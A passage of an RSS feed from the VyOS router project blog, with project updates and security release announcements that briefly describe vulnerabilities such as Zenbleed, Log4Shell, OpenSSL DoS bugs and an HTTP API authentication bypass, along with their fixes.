&lt;p&gt;Hello, community!&lt;br&gt;Curious what we've been up to in January? Our main focus is the final stabilization of the 1.4.0/Sagitta branch, and we will soon make the first EPA (Early Production Access) release — after that point, config syntax and behavior will not change in the 1.4 LTS release lifetime, and all radical changes will go to the upcoming 1.5/Circinus branch. Quite a lot of things are happening in the development branch, and many of those improvements are also backported to 1.4, including support for Let's Encrypt (or any other ACME provider) in PKI, multiple BGP improvements, and an option to disable Spectre/Meltdown mitigations from the CLI.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-project-february-2024-update&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>bgp</category>
      <category>security</category>
      <category>project updates</category>
      <category>1.3</category>
      <category>1.4</category>
      <pubDate>Thu, 08 Feb 2024 07:21:23 GMT</pubDate>
      <author>e.altunbas@vyos.io (Erkin Batu Altunbas)</author>
      <guid>https://blog.vyos.io/vyos-project-february-2024-update</guid>
      <dc:date>2024-02-08T07:21:23Z</dc:date>
    </item>
    <item>
      <title>VyOS 1.3.5 security release</title>
      <link>https://blog.vyos.io/vyos-1.3.5-release</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.5-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Vyos%201.3.5%20LTS.png" alt="1.3.5 LTS" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Сommunity!&lt;/p&gt; 
&lt;p&gt;VyOS 1.3.5/Equuleus LTS release &lt;span&gt;is now officially available for download for customers and contributors. It includes fixes for two security vulnerabilities and a few bugs. One vulnerability is related to the HTTPS API, and the other is in the BGP daemon. Even though they require specific configurations and conditions to exploit, we encourage everyone to update. Images for on-premises deployment and for upgrade are already available, and cloud marketplace listing updates are in progress.&lt;br&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.5-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Vyos%201.3.5%20LTS.png" alt="1.3.5 LTS" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Сommunity!&lt;/p&gt; 
&lt;p&gt;VyOS 1.3.5/Equuleus LTS release &lt;span&gt;is now officially available for download for customers and contributors. It includes fixes for two security vulnerabilities and a few bugs. One vulnerability is related to the HTTPS API, and the other is in the BGP daemon. Even though they require specific configurations and conditions to exploit, we encourage everyone to update. Images for on-premises deployment and for upgrade are already available, and cloud marketplace listing updates are in progress.&lt;br&gt;&lt;/span&gt;&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-1.3.5-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>rolling release</category>
      <category>security</category>
      <category>api</category>
      <category>1.2</category>
      <category>1.3</category>
      <category>1.4</category>
      <pubDate>Fri, 15 Dec 2023 19:37:19 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-1.3.5-release</guid>
      <dc:date>2023-12-15T19:37:19Z</dc:date>
    </item>
    <item>
      <title>What's coming for OpenVPN in VyOS 1.4?</title>
      <link>https://blog.vyos.io/whats-coming-for-openvpn-in-vyos-1.4</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/whats-coming-for-openvpn-in-vyos-1.4" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/OpenVPN%20in%20VyOS%201.4.png" alt="OpenVPN in VyOS 1.4" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;OpenVPN is one of the oldest open-source VPN protocols and implementations. It took the world by storm in the early 2000s because it was a huge improvement over VPN solutions of the time: PPTP that used a patent-encumbered cipher with questionable security; IPsec or L2TP/IPsec, which was hard to set up and very unfriendly to NATed and poorly configured networks; and a variety of proprietary SSL VPNs. OpenVPN was trivial to set up on the client ­— give it a single config file, and you are done, and it was open-source and available for all popular OSes.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/whats-coming-for-openvpn-in-vyos-1.4" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/OpenVPN%20in%20VyOS%201.4.png" alt="OpenVPN in VyOS 1.4" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;OpenVPN is one of the oldest open-source VPN protocols and implementations. It took the world by storm in the early 2000s because it was a huge improvement over VPN solutions of the time: PPTP that used a patent-encumbered cipher with questionable security; IPsec or L2TP/IPsec, which was hard to set up and very unfriendly to NATed and poorly configured networks; and a variety of proprietary SSL VPNs. OpenVPN was trivial to set up on the client ­— give it a single config file, and you are done, and it was open-source and available for all popular OSes.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fwhats-coming-for-openvpn-in-vyos-1.4&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>openvpn</category>
      <category>security</category>
      <category>1.4</category>
      <pubDate>Tue, 26 Sep 2023 13:00:00 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/whats-coming-for-openvpn-in-vyos-1.4</guid>
      <dc:date>2023-09-26T13:00:00Z</dc:date>
    </item>
    <item>
      <title>Zenbleed and OpenSSH agent vulnerabilities and their impact on VyOS</title>
      <link>https://blog.vyos.io/zenbleed-and-the-ssh-agent-vulnerability</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/zenbleed-and-the-ssh-agent-vulnerability" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Zenbleed%20and%20OpenSSH%20agent%20vulnerabilities%20and%20their%20Impact%20on%20VyOS.png" alt="Zenbleed" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;Recently, two severe vulnerabilities were discovered by security researchers. One of them is nicknamed Zenbleed (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-20593"&gt;CVE-2023-20593&lt;/a&gt;) and affects a number of AMD CPUs, the other one (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38408"&gt;CVE-2023-38408&lt;/a&gt;) affects OpenSSH. Both are potentially very serious but, luckily, don't affect most VyOS users. We will include fixes for them in our next releases, of course, and we can provide hotfix packages to people who need them now.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/zenbleed-and-the-ssh-agent-vulnerability" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Zenbleed%20and%20OpenSSH%20agent%20vulnerabilities%20and%20their%20Impact%20on%20VyOS.png" alt="Zenbleed" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;Recently, two severe vulnerabilities were discovered by security researchers. One of them is nicknamed Zenbleed (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-20593"&gt;CVE-2023-20593&lt;/a&gt;) and affects a number of AMD CPUs, the other one (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38408"&gt;CVE-2023-38408&lt;/a&gt;) affects OpenSSH. Both are potentially very serious but, luckily, don't affect most VyOS users. We will include fixes for them in our next releases, of course, and we can provide hotfix packages to people who need them now.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fzenbleed-and-the-ssh-agent-vulnerability&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>vyos</category>
      <category>vulnerability</category>
      <pubDate>Thu, 27 Jul 2023 10:16:51 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/zenbleed-and-the-ssh-agent-vulnerability</guid>
      <dc:date>2023-07-27T10:16:51Z</dc:date>
    </item>
    <item>
      <title>Recent OpenSSL vulnerabilities do not affect any VyOS versions</title>
      <link>https://blog.vyos.io/cve-2022-3786-vyos-not-vulnerable</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/cve-2022-3786-vyos-not-vulnerable" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Recent%20OpenSSL.png" alt="openssl" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Many people are concerned about recently announced OpenSSL vulnerabilities (&lt;a href="https://cve.circl.lu/cve/CVE-2022-3786"&gt;CVE-2022-3786&lt;/a&gt; and &lt;a href="https://cve.circl.lu/cve/CVE-2022-3602"&gt;CVE-2022-3602&lt;/a&gt;). However, none of the VyOS versions ever released are vulnerable. Those vulnerabilities affect only OpenSSL version &lt;span style="font-weight: bold;"&gt;3.0.x&lt;/span&gt;, while VyOS uses &lt;span style="font-weight: bold;"&gt;1.1.1n&lt;/span&gt; in the 1.3.x LTS line and in the nightly builds of the upcoming 1.4 release,&amp;nbsp; and that version is not vulnerable.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/cve-2022-3786-vyos-not-vulnerable" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Recent%20OpenSSL.png" alt="openssl" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Many people are concerned about recently announced OpenSSL vulnerabilities (&lt;a href="https://cve.circl.lu/cve/CVE-2022-3786"&gt;CVE-2022-3786&lt;/a&gt; and &lt;a href="https://cve.circl.lu/cve/CVE-2022-3602"&gt;CVE-2022-3602&lt;/a&gt;). However, none of the VyOS versions ever released are vulnerable. Those vulnerabilities affect only OpenSSL version &lt;span style="font-weight: bold;"&gt;3.0.x&lt;/span&gt;, while VyOS uses &lt;span style="font-weight: bold;"&gt;1.1.1n&lt;/span&gt; in the 1.3.x LTS line and in the nightly builds of the upcoming 1.4 release,&amp;nbsp; and that version is not vulnerable.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fcve-2022-3786-vyos-not-vulnerable&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>vyos</category>
      <category>openssl</category>
      <category>vulnerability</category>
      <pubDate>Thu, 03 Nov 2022 13:50:29 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/cve-2022-3786-vyos-not-vulnerable</guid>
      <dc:date>2022-11-03T13:50:29Z</dc:date>
    </item>
    <item>
      <title>The future of VyOS image signature verification</title>
      <link>https://blog.vyos.io/minisign-the-future-of-vyos-image-signature-verification</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/minisign-the-future-of-vyos-image-signature-verification" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/photo_2022-09-04_18-37-11.jpg" alt="The future of VyOS image signature verification" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;There's one thing about our releases that we introduced quietly and neglected to explain to those unfamiliar with it: minisign signatures. Let's discuss why we started using them in addition to GPG signatures and what we are going to do next. Read on for details!&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/minisign-the-future-of-vyos-image-signature-verification" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/photo_2022-09-04_18-37-11.jpg" alt="The future of VyOS image signature verification" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;There's one thing about our releases that we introduced quietly and neglected to explain to those unfamiliar with it: minisign signatures. Let's discuss why we started using them in addition to GPG signatures and what we are going to do next. Read on for details!&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fminisign-the-future-of-vyos-image-signature-verification&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <pubDate>Tue, 13 Sep 2022 15:50:31 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/minisign-the-future-of-vyos-image-signature-verification</guid>
      <dc:date>2022-09-13T15:50:31Z</dc:date>
    </item>
    <item>
      <title>VyOS 1.3.1-S1 security release</title>
      <link>https://blog.vyos.io/vyos-1.3.1-s1-security-release</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.1-s1-security-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/131s1.png" alt="VyOS 1.3.1-S1 security release" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello Community!&lt;/p&gt; 
&lt;p&gt;VyOS 1.3.1-S1 security release is now available to customers and contributors to download, and everyone can build it from the source. It fixes a vulnerability in the experimental GraphQL component of our HTTP API server that allowed a remote attacker to bypass authentication and read the complete config. Since the HTTP API is disabled by default and very few people ever enabled it yet, the impact of the vulnerability is (luckily) not very high, and we have no evidence that it was exploited in the wild, but we advise everyone to upgrade nonetheless.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.1-s1-security-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/131s1.png" alt="VyOS 1.3.1-S1 security release" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello Community!&lt;/p&gt; 
&lt;p&gt;VyOS 1.3.1-S1 security release is now available to customers and contributors to download, and everyone can build it from the source. It fixes a vulnerability in the experimental GraphQL component of our HTTP API server that allowed a remote attacker to bypass authentication and read the complete config. Since the HTTP API is disabled by default and very few people ever enabled it yet, the impact of the vulnerability is (luckily) not very high, and we have no evidence that it was exploited in the wild, but we advise everyone to upgrade nonetheless.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-1.3.1-s1-security-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <pubDate>Wed, 30 Mar 2022 08:23:06 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-1.3.1-s1-security-release</guid>
      <dc:date>2022-03-30T08:23:06Z</dc:date>
    </item>
    <item>
      <title>VyOS 1.3.1 release</title>
      <link>https://blog.vyos.io/vyos-1.3.1-release</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.1-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/VyOS%201.3.1.png" alt="VyOS 1.3.1" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community&lt;/p&gt; 
&lt;p&gt;VyOS 1.3.1 release is now available:&lt;/p&gt; 
&lt;p&gt;subscribers (customers and contributors) can download binary images from the support portal, and everyone can build it from the source.&lt;/p&gt; 
&lt;p&gt;The driving force for this release is CVE-2022-0778, but it features a whole bunch of bug fixes and a few new features in addition to it.&lt;a href="https://blog.vyos.io/cve-2022-0778"&gt; &lt;/a&gt;&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.1-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/VyOS%201.3.1.png" alt="VyOS 1.3.1" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community&lt;/p&gt; 
&lt;p&gt;VyOS 1.3.1 release is now available:&lt;/p&gt; 
&lt;p&gt;subscribers (customers and contributors) can download binary images from the support portal, and everyone can build it from the source.&lt;/p&gt; 
&lt;p&gt;The driving force for this release is CVE-2022-0778, but it features a whole bunch of bug fixes and a few new features in addition to it.&lt;a href="https://blog.vyos.io/cve-2022-0778"&gt; &lt;/a&gt;&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-1.3.1-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <category>lts</category>
      <category>1.3</category>
      <category>equuleus</category>
      <pubDate>Mon, 21 Mar 2022 19:48:22 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-1.3.1-release</guid>
      <dc:date>2022-03-21T19:48:22Z</dc:date>
    </item>
    <item>
      <title>CVE-2022-0778: remote DoS in OpenSSL, VyOS 1.3.0 is affected</title>
      <link>https://blog.vyos.io/cve-2022-0778</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/cve-2022-0778" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/CVE-2022-0778.png" alt="CVE-2022-0778" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello Community!&lt;/p&gt; 
&lt;p&gt;Yesterday the OpenSSL team disclosed a remote DoS vulnerability in OpenSSL versions 1.0.2, 1.1.1, and 3.0. You can find a complete description here in their&amp;nbsp; &lt;a href="https://www.openssl.org/news/secadv/20220315.txt"&gt;CVE-202200778&lt;/a&gt; report. In short, any remote attacker can cause an infinite loop in OpenSSL by attempting to establish a TLS connection with a specially crafted malformed certificate, and cause a denial of service.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/cve-2022-0778" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/CVE-2022-0778.png" alt="CVE-2022-0778" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello Community!&lt;/p&gt; 
&lt;p&gt;Yesterday the OpenSSL team disclosed a remote DoS vulnerability in OpenSSL versions 1.0.2, 1.1.1, and 3.0. You can find a complete description here in their&amp;nbsp; &lt;a href="https://www.openssl.org/news/secadv/20220315.txt"&gt;CVE-202200778&lt;/a&gt; report. In short, any remote attacker can cause an infinite loop in OpenSSL by attempting to establish a TLS connection with a specially crafted malformed certificate, and cause a denial of service.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fcve-2022-0778&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>openvpn</category>
      <category>security</category>
      <category>ssl</category>
      <pubDate>Wed, 16 Mar 2022 20:22:41 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/cve-2022-0778</guid>
      <dc:date>2022-03-16T20:22:41Z</dc:date>
    </item>
    <item>
      <title>Log4Shell vulnerability</title>
      <link>https://blog.vyos.io/log4shell</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/log4shell" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/logs.png" alt="Logs" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello Community!&lt;/p&gt; 
&lt;p&gt;Everyone is talking about the &lt;span style="font-weight: normal;"&gt;CVE-2021-44228 vulnerability recently found in the Log4j logging library&lt;/span&gt;, which was nicknamed Log4Shell because it allows an attacker to execute arbitrary code on a remote server if they can send it data that will appear inside log messages.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/log4shell" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/logs.png" alt="Logs" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello Community!&lt;/p&gt; 
&lt;p&gt;Everyone is talking about the &lt;span style="font-weight: normal;"&gt;CVE-2021-44228 vulnerability recently found in the Log4j logging library&lt;/span&gt;, which was nicknamed Log4Shell because it allows an attacker to execute arbitrary code on a remote server if they can send it data that will appear inside log messages.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Flog4shell&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>infrastructure</category>
      <category>security</category>
      <pubDate>Tue, 14 Dec 2021 17:43:08 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/log4shell</guid>
      <dc:date>2021-12-14T17:43:08Z</dc:date>
    </item>
    <item>
      <title>VyOS 1.2.6-S1 security release</title>
      <link>https://blog.vyos.io/vyos-1.2.6-s1-security-release</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.2.6-s1-security-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Security%20release.png" alt="1.2.6-s1" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;VyOS 1.2.6 release was found to be suspectible to &lt;span&gt;&lt;a href="https://doc.powerdns.com/recursor/security-advisories/powerdns-advisory-2020-01.html"&gt;CVE-2020-10995&lt;/a&gt;. It's a low-impact vulnerability in the PowerDNS recursor that allows an attacker to cause performance degradation via a specially crafted authoritative DNS server reply.&lt;br&gt;&lt;/span&gt;&lt;/p&gt; 
&lt;p&gt;&lt;span&gt;And we provide fix for in in 1.2.6-s1 release&lt;/span&gt;&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.2.6-s1-security-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Security%20release.png" alt="1.2.6-s1" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;VyOS 1.2.6 release was found to be suspectible to &lt;span&gt;&lt;a href="https://doc.powerdns.com/recursor/security-advisories/powerdns-advisory-2020-01.html"&gt;CVE-2020-10995&lt;/a&gt;. It's a low-impact vulnerability in the PowerDNS recursor that allows an attacker to cause performance degradation via a specially crafted authoritative DNS server reply.&lt;br&gt;&lt;/span&gt;&lt;/p&gt; 
&lt;p&gt;&lt;span&gt;And we provide fix for in in 1.2.6-s1 release&lt;/span&gt;&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-1.2.6-s1-security-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <pubDate>Mon, 28 Sep 2020 19:22:19 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-1.2.6-s1-security-release</guid>
      <dc:date>2020-09-28T19:22:19Z</dc:date>
    </item>
    <item>
      <title>CVE-2019-11477 (TCP SACK panic) and an Intel i40e driver issue</title>
      <link>https://blog.vyos.io/cve-2019-11477-tcp-sack-panic-and-an-intel-i40e-driver-issue</link>
      <description>&lt;p&gt;Recently discovered vulnerability in the Linux kernel's TCP selective acknowledgement processing code potentially allows a remote attacker to cause a kernel panic with a specially crafted packet sequence. You can read the details in &lt;a href="https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md"&gt;the announcement&lt;/a&gt;&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Recently discovered vulnerability in the Linux kernel's TCP selective acknowledgement processing code potentially allows a remote attacker to cause a kernel panic with a specially crafted packet sequence. You can read the details in &lt;a href="https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md"&gt;the announcement&lt;/a&gt;&lt;/p&gt;  
